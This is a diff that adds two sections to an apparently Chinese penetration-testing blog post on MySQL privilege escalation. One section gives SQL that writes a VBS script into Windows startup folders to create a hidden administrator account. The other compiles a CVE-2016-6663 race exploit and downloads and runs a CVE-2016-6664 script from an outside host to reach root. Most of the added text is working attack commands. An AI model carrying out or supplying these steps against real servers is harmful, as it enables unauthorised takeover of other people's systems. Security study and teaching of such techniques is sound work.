--- a/_posts/2024-08-01-mysql.md
+++ b/_posts/2024-08-01-mysql.md
@@ -1661,3 +1661,60 @@ msf6 > run
 实际运行效果如下：
 
 ![image-20240803131819501](\img\image-20240803131819501.png)
+
+
+
+#### 25.3 启动项提权
+
+MySQL的启动项提权，原理就是通过mysql把一段vbs脚本导入到系统的启动项下，如果管理员启动或者重启的服务器，那么该脚本就会被调用，并执行vbs脚本里面的命令。
+
+**以下是启动项路径**
+
+```bash
+#2003
+C:\Documents and Settings\Administrator\Start Menu\Programs\Startup
+C:\Documents and Settings\All Users\Start Menu\Programs\Startup
+#2008
+C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup
+C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup
+```
+
+有了路径我们在mysql的shell下输入如下代码
+
+```bash
+create table a (cmd text); 
+insert into a values ("set wshshell=createobject (""wscript.shell"") " ); 
+insert into a values ("a=wshshell.run (""cmd.exe /c net user suifeng p@ssw0rd /add"",0) " ); 
+insert into a values ("b=wshshell.run (""cmd.exe /c net localgroup administrators suifeng /add"",0) " ); 
+select * from a into outfile "C:\\Documents and Settings\\All Users\\「开始」菜单\\程序\\启动\\a.vbs";
+```
+
+![21](https://f12bug.oss-cn-shanghai.aliyuncs.com/2021/9/30/sql/21.png)
+
+然后我们在对应路径下就可以看到我们的vbs脚本了
+
+![22](https://f12bug.oss-cn-shanghai.aliyuncs.com/2021/9/30/sql/22.png)
+
+然后重启，即可发现vbs脚本里面创建的用户。
+
+![23](https://f12bug.oss-cn-shanghai.aliyuncs.com/2021/9/30/sql/23.png)
+
+
+
+#### 25.4 CVE-2016-6663、CVE-2016-6664组合提权
+
+1、利用CVE-2016-6663将www-data权限提升为mysql权限：
+
+```bash
+cd /var/www/html/
+gcc mysql-privesc-race.c -o mysql-privesc-race -I/usr/include/mysql -lmysqlclient
+./mysql-privesc-race test 123456 localhost testdb
+```
+
+2、利用CVE-2016-6664将Mysql权限提升为root权限：
+
+```bash
+wget http://legalhackers.com/exploits/CVE-2016-6664/mysql-chowned.sh
+chmod 777 mysql-chowned.sh
+./mysql-chowned.sh /var/log/mysql/error.log
+```
